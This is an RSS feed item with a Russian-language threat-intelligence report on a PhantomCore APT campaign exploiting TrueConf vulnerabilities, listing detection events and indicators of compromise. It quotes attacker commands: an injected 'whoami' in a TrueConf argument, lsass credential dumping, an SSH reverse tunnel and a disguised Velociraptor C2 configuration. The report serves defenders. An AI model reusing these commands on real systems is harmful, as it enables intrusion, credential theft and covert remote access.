<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>PhantomCore &#8211; PT ESC</title>
	<atom:link href="/tag/phantomcore/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Mon, 05 Oct 2026 12:16:38 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>PhantomCore &#8211; PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Operation CyberPosi 🤔</title>
		<link>/operation-cyberposi/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Wed, 10 Dec 2025 13:27:52 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[PhantomCore]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/operation-cyberposi-%f0%9f%a4%94/</guid>

					<description><![CDATA[Operation CyberPosi 🤔 Команда PT ESC IR совместно с командой Threat Intelligence наблюдают новую кампанию APT-группировки PhantomCore, в которой атакующие массово взламывают компании через цепочку уязвимостей (BDU:2025-10114, BDU:2025-10115, BDU:2025-10116) в сервисе видеоконференцсвязи…]]></description>
										<content:encoded><![CDATA[<p><strong>Operation CyberPosi 🤔</strong></p>
<p>Команда PT ESC IR совместно с командой Threat Intelligence наблюдают новую кампанию APT-группировки <a href="https://ptsecurity.com/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/" rel="noopener" target="_blank">PhantomCore,</a> в которой атакующие массово взламывают компании через цепочку уязвимостей (<a href="https://bdu.fstec.ru/vul/2025-10114" rel="noopener" target="_blank">BDU:2025-10114,</a> <a href="https://bdu.fstec.ru/vul/2025-10115" rel="noopener" target="_blank">BDU:2025-10115,</a> <a href="https://bdu.fstec.ru/vul/2025-10116" rel="noopener" target="_blank">BDU:2025-10116</a>) в сервисе видеоконференцсвязи TrueConf.</p>
<p>Информация про уязвимости в сервисе была опубликована в августе в БДУ ФСТЭК, а также были <a href="https://trueconf.ru/blog/update/trueconf-server-security-update-08-25" rel="noopener" target="_blank">выпущены</a> рекомендации по обновлению. Ранее про использование данных уязвимостей сообщали специалисты RED Security <a href="https://redsecurity.ru/news/khakery-atakuyut-rossiyskie-kompanii-s-pomoshchyu-uyazvimostey-v-trueconf" rel="noopener" target="_blank">в своем материале.</a></p>
<p><strong>👀</strong><strong> Пример выполнения команды после эксплуатации от имени процесса </strong><code>tc_server.exe</code><strong>:<br />
</strong></p>

<pre class="wp-block-code"><span><code class="hljs language-plaintext">cmd.exe /s /c "C:\\Program Files\\TrueConf Server\\tc_server.exe" /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||whoami|| /File:"C:\\TrueConf\\activation\\offlinereg.vrg"</code></span></pre>

<p><strong>Пример события в журналах для обнаружения фактов компрометации:<br />
</strong></p>

<pre class="wp-block-code"><span><code class="hljs language-yaml"><span class="hljs-attr">error:</span> <span class="hljs-string">the</span> <span class="hljs-string">required</span> <span class="hljs-string">argument</span> <span class="hljs-string">for</span> <span class="hljs-string">option</span> <span class="hljs-string">'--Serial'</span> <span class="hljs-string">is</span> <span class="hljs-string">missing</span></code></span></pre>

<p>Получив доступ в инфраструктуру, атакующие действуют достаточно избирательно и используют разные техники для маскировки своей активности под действия специалистов по информационной безопасности.</p>
<p>После этого атакующие развивают атаку в сети и продвигаются в инфраструктуре, используя протоколы удаленного управления <code>WinRM</code> и <code>RDP</code>. Использование <code>WinRM</code> можно мониторить в событиях Windows, а также в <a href="https://pgerlings.me/winrmclientlist" rel="noopener" target="_blank">реестре:</a></p>

<pre class="wp-block-code"><span><code class="hljs language-plaintext">Microsoft\Windows\CurrentVersion\WSMAN\SafeClientList\WSManSafeClientList</code></span></pre>

<p>Для развития атаки и получения доступа к привилегированным учетным записям злоумышленники получали дамп процесса <code>lsass</code>, используя для этого такие инструменты, как:</p>
<p>• DFIR-утилита для создания дампа оперативной памяти <a href="https://www.magnetforensics.com/resources/magnet-dumpit-for-windows/" rel="noopener" target="_blank">DumpIt</a> (<code>DumpIt.exe /O dump.dmp</code>)<br />
• библиотека файловой системы <a href="https://github.com/dokan-dev/dokany" rel="noopener" target="_blank">Dokan</a><br />
• утилита для анализа дампов оперативной памяти <a href="https://github.com/ufrisk/MemProcFS" rel="noopener" target="_blank">MemProcFS</a> (<code>memprocfs.exe -device dump.dmp / M:\name\lsass.exe-123\minidump</code>)</p>
<p>На хостах атакующие закреплялись, используя в первую очередь ряд собственных инструментов:</p>
<p>• HeartDoor<br />
• MacTunnelRAT (предназначен для создания обратного SSH-туннеля)<br />
• PhantomSscp (предназначен для создания обратного SSH-туннеля)<br />
• OpenSSH (<code>ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 [REDACTED]@[REDACTED]</code>)<br />
• Velociraptor</p>
<p>Особое внимание мы обращаем на установку утилиты <a href="https://docs.velociraptor.app/" rel="noopener" target="_blank">Velociraptor,</a> которая, как правило, используется специалистами в ходе расследования инцидентов информационной безопасности, а атакующими — для удаленного управления. Ранее про использование DFIR-инструмента атакующими <a href="https://rt-solar.ru/solar-4rays/blog/4559/" rel="noopener" target="_blank">сообщали</a> специалисты Solar 4RAYS.</p>
<p><strong>Пример конфигурации:<br />
</strong></p>

<pre class="wp-block-code"><span><code class="hljs language-yaml"><span class="hljs-attr">version:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">velociraptor</span>
  <span class="hljs-attr">version:</span> <span class="hljs-number">0.74</span><span class="hljs-number">.2</span>
  <span class="hljs-attr">commit:</span> <span class="hljs-string">121178eb6</span>
  <span class="hljs-attr">build_time:</span> <span class="hljs-string">"2025-04-20T01:04:04Z"</span>
  <span class="hljs-string">...</span>
<span class="hljs-attr">Client:</span>
  <span class="hljs-attr">server_urls:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">https://telecom-connect.online/</span>
  <span class="hljs-attr">windows_installer:</span>
    <span class="hljs-attr">service_name:</span> <span class="hljs-string">WindowsSecurityAgentSvc</span>
    <span class="hljs-attr">install_path:</span> <span class="hljs-string">C:\Windows\System32\Windows</span> <span class="hljs-string">Security</span> <span class="hljs-string">Health\SecurityHealhAgent.exe</span>
    <span class="hljs-attr">service_description:</span> <span class="hljs-string">Windows</span> <span class="hljs-string">Security</span> <span class="hljs-string">Agent</span> <span class="hljs-string">Service</span>
    <span class="hljs-string">...</span></code></span></pre>

<p>🐾 <strong>Paths</strong></p>
<p></p>
<pre class="wp-block-code"><code>c:\Windows\ime\ssh.msi
c:\Windows\ime\k.msi
C:\Program Files\TrueConf Server\httpconf\site\private\css\c.css
C:\Program Files\TrueConf Server\httpconf\site\public\rx.exe
C:\Program Files\TrueConf Server\httpconf\site\public\ws.dll
C:\TrueConf\activation\offlinereg.vrg
C:\Windows\System32\Windows Security Health\SecurityHealhAgent.exe
C:\Windows\System32\dfxhost.dll
Check-Update.xml
Check-Update.ps1
Create-Check-Update-Task.ps1</code></pre>
<p></p>
<p>🧑‍💻 <strong>IoCs</strong></p>
<p><strong>HeartDoor</strong></p>
<p></p>
<pre class="wp-block-code"><code>8f2f31aaa46920efdfa622b52cd8cd53
fde9563317a0c0249447b123b2137b0e

185.189.12.166</code></pre>
<p></p>
<p><strong>PhantomSscp</strong></p>
<p></p>
<pre class="wp-block-code"><code>e5b540f47ec1707fcd9980ab426be115
4b2ce3df0bae02806a72139b5d9e9a55
486faa9e2efbf78d4c03ba5dfe72eb1d
99ef13d85d2b45cb24a86f1e9923d63a  


reserve-safe.online
online-channel.online
infonixsecurity.online
xbox-updater.online</code></pre>
<p></p>
<p><strong>MacTunnelRAT</strong></p>
<p></p>
<pre class="wp-block-code"><code>a346f2145bb7b3cce7c8c8c4d88d4678
c549a2e6533e73ea39bfa466e5e6dcd8
ad64f8c8469c87ed0c395c8936550af6

cyberposi.space
nexaguard.space
solution-itspace.online
moscow-tv.online
analytisec.space
safebloom.space
cloud-update.online
shieldify.online
optivault.space
brightshield.space
trustbeam.space
188.127.227.46</code></pre>
<p></p>
<p><strong>Velociraptor</strong></p>
<p></p>
<pre class="wp-block-code"><code>d91f8fb7ee4ec98bd80bad69d7667842

telecom-connect.online</code></pre>
<p></p>
<p><strong>Stage Hub</strong></p>
<p></p>
<pre class="wp-block-code"><code>31.57.93.105</code></pre>
<p></p>
<p><strong>SSH Tunnel Control Panel</strong></p>
<p></p>
<pre class="wp-block-code"><code>77.73.39.120
191.101.184.123</code></pre>
<p></p>
<p><span class="hashtag">#ioc</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ti</span> <span class="hashtag">#ir</span> <span class="hashtag">#detect</span> <span class="hashtag">#apt</span> <span class="hashtag">#PhantomCore</span><br /><a href="https://t.me/ptescalator" target="_blank" rel="noopener">@ptescalator</a></p>]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
